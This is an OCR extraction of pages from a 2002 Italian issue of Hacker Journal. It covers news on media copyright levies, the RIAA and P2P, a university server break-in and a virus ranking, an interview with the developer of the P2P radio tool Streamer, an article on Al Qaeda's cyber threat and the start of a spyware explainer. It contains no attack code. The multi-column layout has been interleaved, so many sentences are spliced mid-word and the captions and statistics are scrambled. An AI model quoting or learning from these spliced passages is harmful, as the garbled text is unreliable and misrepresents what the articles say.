identificare la st Il
TheCorrectAnswer 3
zion i su l sito.
fornita nelle istru
che è la stringa ri comandi, e
NokiaIsGood Try2Hack 2
izzare i va
è di anal
modo migliore ruzioni che re- hackerzzz 1
ramma delle ist
inserire nel prog rie stringhe, in
ri assunti dalle va
stituiscano i valo namento dell'al-
indizi sul funzio Password Username Livello
modo da avere riuscire a capi-
to modo, si può
goritmo. In ques ta.
password richies
re quale sia la
9 | www.hackerjournal.it
10_13 News_NEW 4-09-2002 10:55 Pagina 10

news
HOT! ! LA SIAE VUOLE IL "PIZZO" SUI CD-ROM

he ne pensaste se il Governo raddoppiasse i Questi importi saranno pagati anche da cui


! HP STRINGE IL Cpedaggi autostradali per suddividere tra tutti i userà i CD-R per fare un backup dei
GUINZAGLIO SU viaggiatori il costo delle multe per eccesso di ve- propri dati, una cassetta audio per re-
BRUCE PERENS locità? O se, per via dei delitti impuniti, ciascun cit- gistrare un'intervista (ormai si usano quasi
tadino dovesse passare un mese in galera? Suona solo per scopi diversi dalla duplicazione), o una
er dimostrare il suo impegno nel campo assurdo, no? Eppure qualcosa di molto simile
Pdell’open source, tempo fa Hewlett-Pac-
video cassetta per registra-
sta per accadere nel campo del di- re la comunione del
kard ha assunto Bruce Perens, uno dei “gu- ritto d'autore. figlio. Il decreto legis-
ru” del sofware libero. Come molti altri lavo- La situazione è questa; lativo dovrebbe re-
ratori in tutto il mondo, Bruce ha subìto già ora, la Siae cepire una diretti-
pressioni dal suo datore di lavoro. guadagna un va europea che
Hewlett-Packard lo ha invitato a non fare compenso su invita gli stati a
una dimostrazione pubblica delle ogni sup- emanare leggi in
pratiche di rimozione delle prote- porto di questo senso,
zioni regionali di un lettore DVD (noi abbia- registra- ma in Gran
mo spiegato come fare nel numero 6 di HJ). zione ver- Bretagna, Ir-
La dimostrazione avrebbe dovuto tenersi du- gine ven- landa, Lussem-
rante la Open Source Convention 2002 di duto, a titolo burgo, Norvegia e
San Diego. di risarcimento Portogallo queste
Effettivamente, Perens avrebbe potuto per i mancati tasse non esistono, e ne-
subire conseguenze rilevanti, in base alle guadagni derivanti gli altri Paesi gli importi sono molto,
nuove leggi americane sul copyright. K dalle duplicazioni illegali molto inferiori a quelli indicati dalla propo-
che possono essere eseguite pro- sta di legge. L'unica speranza è che, prima dell'ap-
prio con quel supporto. Il tutto già suona strano provazione il testo venga drasticamente modifica-
! INTERCETTAZIONI? (far pagare una tassa a tutti come risarcimento dei
danni derivanti dal comportamento di pochi), ma
to, ma è molto flebile (tra l'altro, il Governo ha su
questa materia una delega che gli permette di evi-
NO, THANKS! fino a questo momento è stato sopportabile per- tare la discussione della legge in Parlamento o nel-
a Commissione Nazionale per l’Informati- ché questi compensi erano molto modesti. Se- le Commissioni).
Lca e la Libertà inglese ha appena conte- condo il contenuto di una bozza di decreto legisla- A peggiorare la rabbia, c'è il più che legittimo so-
stato la legge sulla sorveglianza elettronica tivo che dovrà essere prossimamente discusso al spetto che i soldi raccolti in questo non
adottata nel 2000 dal governo inglese. La Consiglio dei Ministri, questi compensi do- saranno affatto ridistribuiti in modo
legge è in totale contraddizione vranno essere aumentati in modo uniforme tra tutti gli autori e gli editori, grandi e
con i diritti fondamentali dell’Uo- spropositato, rendendoli talvolta persi- piccoli, ma finiranno nelle tasche dei po-
mo. La responsabile, Elizabeth France, ha no superiori al costo fisico del suppor- chi potentissimi soggetti che già ora si ar-
dichiarato che gli attentati dell’11 settembre to. Attualmente, si va dai 4 centesimi di euro per ricchiscono spartendosi, talvolta in modo poco
2001 hanno veramente cambiato l’equilibrio una cassetta audio (circa 77 delle vecchie lire) a i trasparente, i soldi raccolti dalla Siae . Se volete
tra vita privata e sicurezza pubblica. K 6 centesimi (100 lire circa) di un CD-R dati o di una conoscere i meccanismi che regolano il giro dei
videocassetta da 180 minuti. Secondo la bozza del soldi in Siae, leggetevi la trascrizione dell'inchiesta
D.Lgs questi importi diventeranno, rispettivamen- della trasmissione Report, disponibile su www.re-
! UNA LIBRERIA FIN te, 60 e 84 centesimi per audio cassette e Cd-R, e
addirittura 1,35 euro per una videocassetta.
port.rai.it/2liv.asp?s=82. Attenzione però: c'è da
incazzarsi fino a farsi venire il fegato marcio. K
TROPPO APERTA
arnes&Noble, il concorrente principale
Bdella libreria online Amazon negli Stati ! PAGHERETE CARO, PAGHERETE TUTTO
Uniti, si è appena comportata in modo asso- ,cco di quanto aumenteranno i prezzi dei supporti vergini e dei dispositivi di memorizzazione. I dati so-
lutamente singolare e poco simpatico. Non Eno stati ricavati dalla tabella pubblicata dall'Andec all'indirizzo www.andec.it/news/fr_news1.htm. K
si è degnata di rispondere alla
messa all’erta di un esperto di si-
curezza, che ha rilevato non meno di una PRODOTTO COMPENSO ATTUALE COMPENSO PREVISTO
mezza dozzina di falle nel sistema di sicurez- DALLO SCHEMA DI D. LGS
za del sito. Queste falle avrebbero potuto
permettere di avere accesso a certe Cassetta audio € 0,04 (70 lire) € 0,60 (1160 lire)
informazioni riservate sui suoi CD-R audio 74 min € 0,08 (155 lire) € 0,56 (1085 lire)
clienti. Neanche un grazie all’esperto che CD-R dati 650 Mb. € 0,05 (100 lire) € 0,84 (1600 lire)
si sarebbe anche offerto di correggere i pro- Video cassetta an. 180 min € 0,06 (120 lire) € 1,35 (2600 lire)
blemi gratuitamente. Una condotta simile di DVD - R 180 min Nessun compenso € 2,04 (3950 lire)
certo non invoglia gli hacker a comportarsi Videoregistratore analogico Nessun compenso 3% del prezzo
in modo eticamente corretto. K Masterizzatori CD dati 3% sul 20% del prezzo 3% del prezzo

10 | www.hackerjournal.it
10_13 News_NEW 4-09-2002 10:55 Pagina 11

news

! SICUREZZA ASSOLUTA

i, è possibile ed è appe-
Sna stato dimostrato da
un istituto svizzero, colle-
gando due PC attraverso
un cavo in fibra ottica. Il
problema è la distanza limi-
tata. Alcuni ricercatori sviz-
zeri hanno potuto stabilire
un record di distanza di 67
Km! La particolarità di
questa tecnica è che
ciascun bit di infor-
mazione viene tra-
sportato da un solo
fotone. Ogni tentativo di
intercettazione quindi por-
terebbe necessariamente
all'interruzione del segnale
(se il singolo fotone viene
intercettato, non può più
arrivare a destinazione) , e
sarebbe immediata-
mente individuato e
contrastato. K

! I CELLULARI AL SERVIZIO DEI RIBELLI RADUNO HACKER A CELLATICA


(BS)
l ministero delle comunicazioni indiano po-
Itrebbe impedire l’estensione delle Vorrei segnalarvi un
rete cellulare nel nord ovest del
paese, per paura che i gruppi di indipen- piccolo incontro che sto
dentisti li utilizzino per coordinare le proprie organizzando qui nel mio
azioni. Non meno di 50 gruppi di guerri-
glieri, infatti, lottano attivamente in que- paese nella provincia di
sta zona a maggioranza musulmana. At- Brascia!!!! (CELLATICA).
tualmente i ribelli devono lasciare la
giungla in cui combattono e cercare
Vorrei riunire tutti gli
un telefono pubblico per fare le loro hacker e newbie della
telefonate. “Quando avranno a dis- provincia e non, per
posizione i telefoni cellulari, potran-
no facilmente parlare ai loro capi scambiare delle opinioni e
dalla giungla e condurre le loro approfondire quello che gia’
operazioni senza paura”, ha di-
chiarato il generale J.S.Verma, si sa sull’hacking!!
comandante delle regione Est, Per dare la possibilita’ anche
all’agenzia Reuters.
Provate a pensare a quale a chi di hacking non se ne
reazione potrebbe esserci intende di capirci qualcosa di
da noi se accadesse qual-
cosa di simile: abituati co- piu’ e stare un po’ in
me siamo a usare il cellu- compagnia, visto che di
lare per ogni banalità,
una notizia simile
meeting se ne fanno ben pochi.
potrebbe davvero Ho intenzione di organizzarlo
provocare una ri- per il 28 settembre qui a
voluzione... K
Cellatica!!!

www.hackerjournal.it | 11
10_13 News_NEW 4-09-2002 10:56 Pagina 12

news
HOT! ! DISCOGRAFICI: LICENZA DI HACKERARE

egli Stati Uniti è stata depositata una pro- attaccato il server dell’agenzia americana...
! VIRUS, DIFFUSIONE Nposta di legge per permettere ai produtto- Tutti potranno arrogarsi questo di-
FINALMENTE IN CALO ri di cinema e di musica di piratare legalmen- ritto, che non si basa su niente e si-
er la prima volta nell’anno, tra il giugno e te le reti peer-to-peer. I detentori dei diritti curamente non su una parvenza di prova.
P il luglio scorsi, il numero di virus è (autore, editore, ecc.) potranno quindi attac- Quindi, riassumendo, ad alcuni tutto è per-
diminuito. Dopo un inizio d’anno molto ca- care una rete o introdursi in essa quando ab- messo con la copertura della giustizia, ma la
rico, sembrerebbe che ci sia stata una tregua biano un “ragionevole sospetto” che siano pena per i comuni mortali per lo stesso atto è
estiva che potrebbe risultare da una presa di presenti copie illecite nelle “reti di scambio di il carcere a vita. Viva lo zio Sam!
coscienza da parte degli utenti che comincia- file peer-to-peer accessibili al pubblico” so- Qualche giorno dopo la presentazione al
no a dare sempre più importanza alla sicurez- spettate. In breve, carta bianca per pira- senato americano della legge che autorizza
za e in particolare agli antivirus. Alcuni però tare tutto ciò che desiderano con il solo l’attacco delle reti Peer to Peer (Kazaa,
stimano che questo potrebbe essere il risul- pretesto che esista un “ragionevole so- Morpheus, ecc.) con tutti i mezzi tecnologici
tato del fatto che, semplicemente, la gente spetto” (hum... anche da loro sono alle prese possibili, il sito della RIAA
utilizza meno il PC durante l’estate. K con queste faccende). Tutti possono sospetta- (www.riaa.org) ha subito un’onda di
re di tutto, una persona potrebbe benissimo attacchi di negazione di servizio per
dire di pensare che su uno dei PC di una rete tre giorni. Un avvertimento che i Pirati sono
! PERÙ: IL LOBBISMO della Nasa ci siano degli MP3 e per questo ha pronti a reagire... K

DI MICROSOFT
paventata dall’annuncio del governo peru-
Sviano di favorire l’open source, Microsoft
fa grandi pressioni sull’ambasciato-
re americano a Lima affinché quest’ulti-
mo sostenga la sua causa e freni gli ardori del
governo. Malgrado questa aperta pressione da
parte di Microsoft, il governo peruviano non
sembra per il momento cambiare opinione. Po-
co elegantemente, Microsoft ha ricordato che
potrebbe rappresentare 15.000 lavoratori per il
Perù. Una procedura per niente elegante ma
che non stupisce più... K

! GIOCOSA
MACCHINA DA GUERRA
l nostro Dreamcast non è più inoffensivo.
IUn gruppo di hacker è riuscito a modificare
certe funzioni del Dreamcast per trasformar-
lo in un modulo di attacco. In questo modo si
potrà trasformare in uno zombie, un compu-
ter controllato da remoto allo scopo di pene-
trare in una rete aziendale o portare attacchi
DDoS. Una manipolazione che potrebbe elu-
dere la sagacità di alcuni firewall. K ! CERCANDO DI RENDERE SICURA .NET

! LE RADIO WEB ttualmente Microsoft cerca di reclutare


Aun gruppo di ricercatori e di esperti
UCCISE DALLA RIAA per migliorare e rafforzare le sue ricerche in ma-
partire dal 20 ottobre potrà essere se- teria di sicurezza, specialmente per i suoi nuovi
A gnata la fine delle radio Web. Grazie alla prodotti basati sulla tecnologia .NET. Tra l’altro,
RIAA (o a causa sua), che ha già avuto la Microsoft ha annunciato la creazione del Trust-
testa di Napster, le radio Web dovranno worthy Computing Academic Advisory Board,
pagare milioni di dollari di royalty che riunisce da 12 a 15 collegi e università per
(0,14 cent per pezzo e per ascoltatore). Se contribuire a questo lavoro di ricerca e sviluppo.
questa legge viene adottata, possiamo di- Le università di New York, Cornell o di Los An-
menticarci le radio sul Web. K geles hanno accettato di partecipare.K

12 | www.hackerjournal.it
10_13 News_NEW 4-09-2002 10:56 Pagina 13

news

! GUERRA DIGITALE TRA UNIVERSITÀ INFEZIONI IN


CORSO
tephen LeMenager, direttore delle ammissioni al-
Sl’università di Princeton, ha ammesso di essere Ecco la classifica
penetrato illegalmente nel server dell’università
concorrente, Yale. Ne voleva saggiare la solidità... Di fatto
dei 10 virus piu’
voleva accedere ai dossier di una dozzina di candidati che le attivi durante le
due università si contendono, per poterli convincere. Tra di loro scorse settimane
la nipote di Bush, top model a tempo perso. Tutti i mezzi sem-
brano buoni per reclutare i migliori allievi e la pirateria viene ora secondo RAV
effettuata anche a livello istituzionale... K Antivirus.

! NETART IN MOSTRA AD ANCONA 1 HTML/IFrame Exploit*


2 Win32/Klez.H@mm
al 18 al 22 settembre si svol-
Dgerà ad Ancona la prima 3
4
Win32/Yaha.F@mm
Win32/Sircam@mm
edizione del Festival Italia-
no di Net.Art BananaRAM. 5 Win32/Klez.E@mm
Negli spazi storici della Mole
Vanvitelliana si potranno ammi-
6 Win32/Magistr.B@mm
rare installazioni, performance e 7 I Worm/Hybris.C
dibattiti sulle sperimentazioni ar- 8 Win32/Nimda.E@mm
tistiche che si servono di Inter-
net. Tutte le info le trovate su 9 Win32/Magistr.A@mm
www.bananaram.org K 10 Win32/Desos.A@mm

! IL PENTAGONO LIMITA L’UTILIZZO DELLA TECNOLOGIA SENZA FILI

i sapeva già che le tecnologie senza fili solle- a piacimento, prendere informazioni. Il Pentagono to numero di funzionari. Le nuove regole dovranno
Svano grandi problemi di sicurezza. Il Pentagono limita dunque l’uso di tali tecnologie, imponendo entrare in vigore da qui a un mese secondo il re-
dà un giro di vite. Ha dichiarato che l’uso di severe restrizioni a chi lavora al Pentagono. Da sponsabile delle comunicazioni del Pentagono. Un
tecniche di reti senza fili costituisce una questo momento quindi PDA, cellulari e cambiamento di mentalità sorprendente, dal mo-
porta aperta per gli hacker che possono, computer portatili sono vietati per un cer- mento che il wireless ha grande successo. K

www.hackerjournal.it | 13
14_16_hj08_RADIO PIRATA 4-09-2002 10:59 Pagina 14

personaggio

RADIO PIRATA

I PIRATI PREN
Davanti ai tentativi di regolamentazione e di intromissione in tutto ciò
contrapporsi alle grandi major del “tutto in vendita”. L’ultima incarnazio
nasconde dietro a questo nome che evoca fortemente lo streaming (tecni

V
iaggiamo in questo ambiente stazione a cui si devono aggiungere 500 € invece riservati alle tradizionali radio via
non senza ricordare il fenomeno di forfait di base obbligatori. Un costo etere. Lui ha quindi messo a punto un
delle radio “libere” negli anni troppo alto, piccolo software, Streamer, che permette
Settanta. Con la comparsa di agli internauti di creare la propria
stazioni di diffusione pirata radio online in modo semplice e,
online abbiamo trovato in una soprattuto, non rintracciabile da
chat line l’uomo all’origine di questa cyber parte delle autorità!
rivolta, Iain McLeod.
39 anni, musicista nell’anima ma >> Una rete parallela
sviluppatore di videogiochi nella vita in piena esplosione
quotidiana, questo inglese segue la Le majors partono
linea che ha fatto espandere
Napster: la musica per tutti,
all’attacco delle radio che Streamer, anche se rivoluziona
completamente le possibilità of-
gratuitamente, e l’allontanamento diffondono musica su ferte agli appassionati di musica
dalle grandi società che online, non è affatto una sorpre-
gestiscono la musica. Internet, ma gli hacker non si sa in quanto tale. È il risultato
Per questo rivoluzionario non è arrendono, e mischiando diretto del lento ma conti-
possibile lasciar passare ciò che nuo movimento di quella
accade su Internet senza reagire. streaming e peer to peer, parte della Rete che rifiuta
un’Internet puramente com-
Immediata è stata quindi la sua
reazione alla legge votata dal hanno già pronta merciale. Sono già cinque anni
congresso americano per fissare le che Shoutcast ha cominciato, e da
quote che devono pagare le radio
la risposta allora le tecnologie sono conside-
revolmente migliorate. Anche se an-
online. Somme troppo onerose, cora ha molti bachi, Streamer si basa
che hanno come effetto sul principio che mantiene in vita siste-
immediato la chiusura pura e mi come Gnutella: il fatto di non avere
semplice di numerose radio sul Web. bisogno di server centrali, cosa che
Secondo questa legge le radio devono all’epoca aveva provocato la chiusura di
pagare un minimo di 0.0007 € per Napster e provca oggi la paralisi di Au-
ascoltatore e per canzone trasmessa. dioGalaxy...
Questo rappresenta grosso modo 7 € al specialmente se confrontato con i costi Il sito di Iain McLeod:
mese per ascoltatore per una piccola decisamente più bassi e forfettari che sono www.chaotica.u-net.com

Come installare e usare Streamer


Streamer è ancora un programma in
versione beta, ha una documentazione
un po' scarna e potrebbe non
funzionare con tutte le configurazioni.
o un programma analogo che per-
metta di ascoltare musica trasmessa
su Inter-
net e che
2 Dal sito di Streamer,
h t t p : / / w w w. c h a o t i c a . u -
net.com/page/ streamer.htm,
scaricate il file streamer.zip e scom-
Nel nostro caso non ha voluto saperne riconosca pattatelo in una posizione qualsiasi
di funzionare su un Lan, dietro a un come pro- del vostro disco.
firewall, ma è andato senza troppi pri i file Fate doppio clic
problemi con una normale connessione con esten- sull'icona di
modem. sione .pls. S t r a m e r. e x e
Installate- (nella nostra

1 Se non lo avete già, scaricate


WinAmp (da www.winamp.com)
lo prima
di installare Streamer.
versione, l'icona
era vuota).

14| www.hackerjournal.it
14_16_hj08_RADIO PIRATA 4-09-2002 10:59 Pagina 15

>>

NDONO LE ONDE!
ciò che riguarda la musica in linea, tutta una rete underground si sta organizzando per
azione di questa resistenza che arricchisce i Morpheus, Kazaa o altri è Streamer! Ma chi si
ecnica che permette di caricare in tempo reale i file sonori da Internet)?

>> Intervista a se è questo che vuoi dire :-) Il codice HJ > Oggi la musica rappresenta
sorgente è stato subito diffuso, quindi è molto denaro, cosa ne pensi della
Iain McLeod troppo tardi per fermarlo: è il principio del distribuzione gratuita di essa
peer to peer. Tuttavia devo dire che ho attraverso gli MP3 grazie alle
HJ > Perché hai svi- avuto un po’ di panico quando ho tecnologie P2P?
luppato Streamer? visto la prima notizia riguardante IML > Se le società di musica non facilitano
IML > L’idea mi è venuta Streamer pubblicata sul sito la distribuzione di MP3 attraverso la Rete, la
quando ho sentito par- slashdot insieme al suo codice gente crea le applicazioni che le permettano
lare di un server che sorgente. Con la RIAA, tutto è di farlo. La prima volta che ho scoperto
non aveva sopportato possibile :-( Napster, sono stato collegato 48 ore... Non
l’afflusso di internauti è necessariamente una questione di costi; la
durante una diffu- “...IO SONO SEMPRE cosa più interessante di Napster era la
sione online. Allora possibilità di trovare tutto ciò che ci
mi sono detto: per- STATO UN FAN DELLE interessa.
ché non utilizzare RADIO PIRATA” All’epoca della distribuzione gratuita e
la banda di ogni illimitata di musica online, i prezzi eccessivi
PC invece di quella di un solo > Iain McLoud non hanno più motivo di esistere. Le case
server? All’inizio non pensavo che avreb- discografiche e i loro sbirri come RIAA & Co
be avuto tanto successo, ma dopo la messa HJ > Credi che Internet diventerà un vogliono perseguire le decine di milioni di
in vigore del pagamento di royalty esorbitan- media puramente commerciale, a consumatori che utilizzano i servizi p2p? Si
ti per la diffusione online, ho accelerato lo svi- discapito della natura libertaria che lamentano di miliardi di file scambiati in Rete
luppo per lottare contro questo scandalo. l’ha caratterizzata per anni? grazie ai diversi software p2p, ma tali cifre
IML > Certe persone in effetti spingono in non indicano che esiste una fortissima
HJ > Pensi che ci sia una vera questa direzione, sicuramente nel loro domanda di questo tipo di prestazioni? La
minaccia? A che livello? interesse. Ma Internet non potrà essere gente è pronta a pagare una cifra
IML > Non credo che ci siano dei rischi fisici, commerciale. “Vuole” essere aperta, non ragionevole per utilizzare questo tipo di
censurata e libera, è così che funziona. E servizi, lo fa già per la connessione a Internet
RIAA: Recording Industry Asso-

?
poi, quando si parla di commercio si pensa e per comprare i CD vergini per registrare i
ciation of America, associazione sempre ai soldi, ma esistono altre forme di file MP3. Se si tratta di una cifra mensile
di difesa degli interessi dell’indu- scambio: per esempio, ci può essere una equivalente a ciò che in media spende la
stria musicale nell’America del forma di baratto. gente per comprare dei CD musicali nei
Nord. negozi, funzionerà molto bene e non

3 Se usate un firewall (in que-


sto caso, ZoneAlarm), dovre-
te impostarlo per concedere 4 Quando si apre la finestra di
Stramer, fate clic sul pulsan-
te Configure e inserite la vo-
42; con Isdn 64 e 64, con Adsl 640 e
128.

a Streamer la possibilità di collegar-


si a Internet e anche di agire come
server (tranquil-
li, essendo rila-
stra velocità
di collega-
mento a In-
ternet nei
5
una
Nella parte sinistra dello
schermo, dovrebbe ora appa-
rire
lista
sciato sotto li- campi Down- delle sta-
cenza Gpl, si load Speed e zioni dispo-
può stare tran- U p l o a d nibili. An-
quilli: non ci so- Speed. Nel caso di un normale mo- cora non
no spyware). dem i valori dovrebbero essere 33 e sono tantis-

www.hackerjournal.it |15
14_16_hj08_RADIO PIRATA 4-09-2002 10:59 Pagina 16

personaggio

RADIO PIRATA

p2p: Peer to Peer, connessio- “controllerà” ciò che possiamo fare con Sei già stato minacciato?

? ne punto a punto attraverso un


server centrale o una connes-
sione diretta. Questo tipo di tec-
nologia è molto utilizzata da
esso, quale musica possiamo ascoltare,
quali film possiamo vedere.
È come la fantascienza: gli uomini in nero
hanno intrapreso una vera guerra, cercando
IML > No. “Quando gli uomini buoni non
fanno niente, il male trionfa”.
Dobbiamo opporci a loro, altrimenti il futuro
sarà grigio e poco felice. Da parte mia, non
Napster, Kazaa, ecc. per lo scambio di fi- di far tacere la musica indipendente, in faccio assolutamente niente di illegale,
le MP3, DivX, ecc. modo che non possiamo ascoltare altro che Streamer è un semplice sistema di diffusione
la loro musica. Hanno evidentemente radio via Internet...
perderanno più denaro! Sono dei cattivi “comprato” la legge per poter realizzare E in ogni caso, essendo nel Regno Unito non
uomini d’affari! questo dipendo dalla legislazione americana. Ho
scritto un programma che gioca con la
HJ > Su quali tecnologie si basa musica, no? Se ho qualcosa da temere per
Streamer? Perché la scelta dell’open questo, c’è qualcosa che non va.
source ? Non ho ancora ricevuto minacce ma questo
IML > Di fatto ho appena inventato le non farebbe che rafforzare le mie
“tecnologie” necessarie. Diffondere un opinioni e non impedirà la nascita di
segnale in p2p, al posto del protocollo altri programmi basati sul p2p. La
TCP/IP in modalità full duplex, e In questo modo l’unica RIAA ha potuto fermare Audiogalaxy,
accoppiarlo con un metodo di soluzione sarà “hackerare” il ma io non mi preoccupo troppo per
riconoscimento dei PC che hanno me stesso, sono lontano. E
Streamer per trovare il segnale. nostro PC, altrimenti lui Streamer è Open source...
Tutto questo non era così ovvio
come si potrebbe pensare... Ho “controllerà” ciò che possiamo HJ > Prevedi nuove versioni
fatto la scelta dell’Open Source di Streamer e consideri la
soprattutto per proteggermi. Ma è fare con esso, quale musica possibilità di lavorare con un
vero che ne amo il concetto. Inoltre gruppo per migliorarlo?
l’idea dello streaming p2p è un possiamo ascoltare, Prossime tappe?
concetto talmente fondamentale che IML > Attualmente ci lavoro
non può che essere offerto a tutti.
quali film possiamo vedere. costantemente, quindi ci saranno
altre versioni. Serve una versione
HJ > Cosa pensi della situazione “adatta” e senza bachi in modo che sia
underground ? Pensi che oggi più professionale e più funzionale. Un look
esistano due Internet? migliore e un approccio più Windows
IML > È sempre stato un po’ così. Purtroppo faranno in modo che la gente si trovi a
tutto ciò che non porta denaro alle aziende proprio agio.
è quasi sistematicamente etichettato come Questo mi dovrà ugualmente spingere verso
“underground”. E questo peggiora con la obiettivo e versioni derivate che proporranno servizi a
nuova legge americana in preparazione che desiderano subito una seconda legge che pagamento. Sto diventando un po’ un
possiamo qualificare come fascista, in cui il consenta di installare tecnologie di “guru” in questo ambiente e, devo
minimo movimento potrà essere controllato. sorveglianza sui PC per impedirci di ammetterlo, non mi dispiace.
Una nuova legge ispirata dal mondo degli raggirare la legge. Leggi contro la musica. Da semplice sviluppatore di videogiochi, che
affari (si devono realizzare acquisti, grazie a Pensiamoci un po’... cerca di vendere la sua creazione, “Spheres
regali finanziari ben mirati) che va contro la of Chaos” attraverso il suo sito, mi si offre
volontà e gli interessi delle persone normali. HJ > Tu sei un po’ un pirata delle una nuova promettente strada. K
In questo modo l’unica soluzione sarà onde, sei spaventato da queste
“hackerare” il nostro PC, altrimenti lui grandi organizzazioni come la RIAA?

sime, in ogni caso dovrebbero aggi- computer. Questo perché Streamer


rarsi almeno sulla decina di diverse si comporta come un Server, che "ri-
radio. Fate doppio clic su una delle flette" il canale su cui si è sintonizza-
voci, scelta in base alla descrizione. to, e così facendo permette anche ad
altre persone di collegarsi al nostro

6 Stramer lancerà WinAmp (o


un altro programma analo-
go), che si collegherà alla
stazione radio, che comincerà ad
computer per ascoltare la radio.

essere riprodotta. Come potete no-


tare, WinAmp si collega in realtà al-
l'indirizzo 127.0.0.1, che è il vostro

16| www.hackerjournal.it
17_hj08_bl3 4-09-2002 11:01 Pagina 17

NETWAR

BIN
LADEN:
la minaccia digitale
UN ANNO FA, L’ORRORE IN DIRETTA

11 SETTEMBRE 2001: L’ORRORE BUSSA ALLA PORTA DEL MONDO INTERO. VIENE
INDICATO UN COLPEVOLE: BIN LADEN. IL PUNTO SU UN’INCHIESTA CHE RIMBALZA.

É
passato un anno da zona molto ambita, ma anche a diato eventuali attacchi accoppiati
quando i seguaci di Bin celle utilizzate dagli amministratori online e offline per provare, se ne-
Laden hanno contrasse- locali. Questo non è sfuggito al de- cessario, a disorganizzare i soccor-
gnato l’inizio del ventu- tective specializza- "L’avvenimento che temo di più è un attacco fisi-
nesimo secolo con il to in criminalità hi- co combinato con successo con un attacco riuscito
marchio dell’infamia. Dopo infiniti tech, che ha avver- contro il 911 (ndr: numero di telefono dei pom-
rumori, scoop veramente falsi e ta- tito l’ufficio dell’FBI pieri negli USA)"Ronald Dick, direttore del cen-
glie sempre più alte, si può fare un a San Francisco. Al tro di protezione delle infrastrutture dell’FBI
po’ di ordine... termine di una ra- 12 giugno 2002
Qualche mese fa un militante di Al pida inchiesta con-
Quaeda è stato arrestato e ha det- dotta di concerto con gli esperti del si attaccando le chiamate d’urgen-
to che l’organizzazione ha fatto ri- laboratorio Lawrence Livermore, è za e impedendo l’assistenza.
corso a specialisti informatici, e dis-
apparso chiaramente che numerosi Nonostante sembrino esserci tenta-
poneva di mezzi per attaccare le in- siti americani erano stati oggetto di tivi per sabotare tali servizi, alcuni
frastrutture online. Un discorso un’attenzione molto particolare da sono più prudenti rispetto all’im-
ascoltato dall’FBI, ma che si inseri- parte di internauti collegati da Ara- magine del Ministero della difesa
"Oggi sappiamo che Al Quaeda può attaccarci bia Saudita, Indonesia e americano sul potere reale di dan-
online, ha passato più tempo a studiare le Pakistan… Questi aveva- neggiamento da parte di terroristi
nostre vulnerabilità nel cyberspazio di no concentrato la loro at- nel cyberspazio. Al contrario, la Ca-
quanto avessimo pensato. Il problema non è tenzione sui sistemi di te- sa Bianca e l’FBI parlano di questa
sapere se l’attacco avrà luogo, ma quando." lefonia d’urgenza, di ge- minaccia con termini molto più
Roger Cressey, specialista in antiterrori- nerazione e di trasmis- preoccupati. Due visioni in cui è dif-
smo, consigliere del presidente americano. sione di elettricità, di ficile vedere chiaro, tra desiderio di
stoccaggio e di distribu- informare e il mero calcolo
va in una serie di minacce incoe- zione di acqua, oltre che, e questo politico... K
renti che rivelavano più un delirio è ancora più inquietante, su fabbri- o di
r ischi
fanatico che fatti reali, ma che ha che nucleari e di produzione di gas. e il sia
e n s a ch e r icani
comunque preoccupato. Quando si è visto che certi calco-
ican
i p am bre.
e r e ttivi s ettem
In effetti il detective Chris Hsiung latori sequestrati duran- a m bi 11
egli su o ell’ e il
del dipartimento di polizia di Mou- te l’inchiesta negli am- l 6 2% d o n line n t ati d i a fort
I ato atte s
tain View in California ha comincia- bienti vicini ad Al Quae- tent che iano
n at o gli r ede a ni s -
to a interessarsi alle connessioni da avevano informazioni u do p ni c er ic imen
m en tato a me rica es s i am r an di d
prolungate e rivolte a certi server di e metodi di deviazione o au egli inte
r di g
3 9% d l cuni o nline
Silicon Valley da parte di persone di presa di controllo degli I l e a co
o ch ttac tess
i
situate in Medio Oriente e Asia. allarmi anti incendio, tutto è rischi d i un a mesi
.
gli s del
i 12 e
Queste si interessano in particolare sembrato incastrasi e ha fat- obietti v
simi e ch tacco SOS
/ IP
pr o s ns a r a t
a infrastrutture utilizzate in questa to pensare che avessero stu- nei d i pe i a un BSA
ni e nt e:
Font
sio g o
giun o pr
3 7% ag s arann
Il i no
n
ttiv
obie
|
17 www.hackerjournal.it
gene
re.
18_21_HJ08_SPY 4-09-2002 11:04 Pagina 18

SPYWARE:
privacy

I TUOI DATI PERSONALI SONO IN PERICOLO

La diffusa pirateria del software, o la semplice smania di guadagni, ha spinto i


produttori di shareware a trovare un'altro oggetto da vendere: i dati personali dei
loro utenti. Scoprite con noi cosa sono e come funzionano i programmi spyware,
che permettono ai network pubblicitari di monitorare e registrare le
abitudini di navigazione di persone spesso ignare
è scaduto" e che "occorre acquistare
una licenza e registrare il pro-
gramma" per poterlo continuare ad
utilizzare liberamente. Tuttavia con
un crack scaricato da qualche sito
warez, qualche modifica al registro
o, più semplicemente, la reinstalla-
zione del programma è sempre
stato fin troppo semplice evitare di
registrare gli shareware.

>> Morto lo shareware...

Di fronte a tutto questo, program-


matori e software house hanno
molto spesso dovuto abbandonare
la strada dello shareware per per-
correrne altre più redditizie. Ecco
quindi che molti programmi si sono
evoluti, divenendo adware (dall'in-
glese ad - abbreviazione di adver-
tisement, ovvero inserzione pubbli-
citaria, pubblicità); in pratica all'in-
terno del programma vengono vi-
sualizzati dei banner pubblicitari
sempre diversi e il programmatore
percepisce un compenso in base al
numero di esposizioni e di clic sui
banner stessi. In linea di massima il

M
sistema utilizzato è il medesimo
che viene applicato ai banner pre-
olti tra voi, per non per un limitato periodo di tempo senti nelle pagine Web e, in questo
dire quasi tutti, (solitamente 30 giorni) o per un modo, il programmatore guada-
avranno almeno certo numero di volte o con un ri- gna quella cifra che nessuno altri-
una volta provato stretto numero di funzioni... Scadu- menti gli avrebbe pagato. Da que-
ad installare un programma (ma- to perciò il periodo di prova, ecco sto punto di vista Opera è un caso
gari scaricato da Internet o trovato che fastidiose finestre compaiono emblematico: le prime versioni,
su qualche CD) di tipo shareware, preoccupandosi di ricordare all'u- shareware, ricevettero una tiepida
ovvero utilizzabile gratuitamente tente che "il periodo a disposizione accoglienza tra i navigatori ma a

www.hackerjournal.it |18
18_21_HJ08_SPY 4-09-2002 11:04 Pagina 19

>>

IL GRANDE FRATELLO CI OSSERVA?


partire dal dicembre 2000, con il ri- siti visitati e la permanenza su essi, “Ci sono Adware
lascio cioè della quinta versione i diversi download fatti e le azioni
non più shareware bensì "sponso- effettuate con il browser (inclusi
espliciti e abbastanza
rizzata", il numero degli utenti è eventuali acquisti on-line), la confi- tollerabili, e spyware
cresciuto a dismisura. Volendo per- gurazione dell'hardware, il softwa- nascosti e maliziosi”
ciò riassumere, quando vi collegate re installato, il vostro nome come
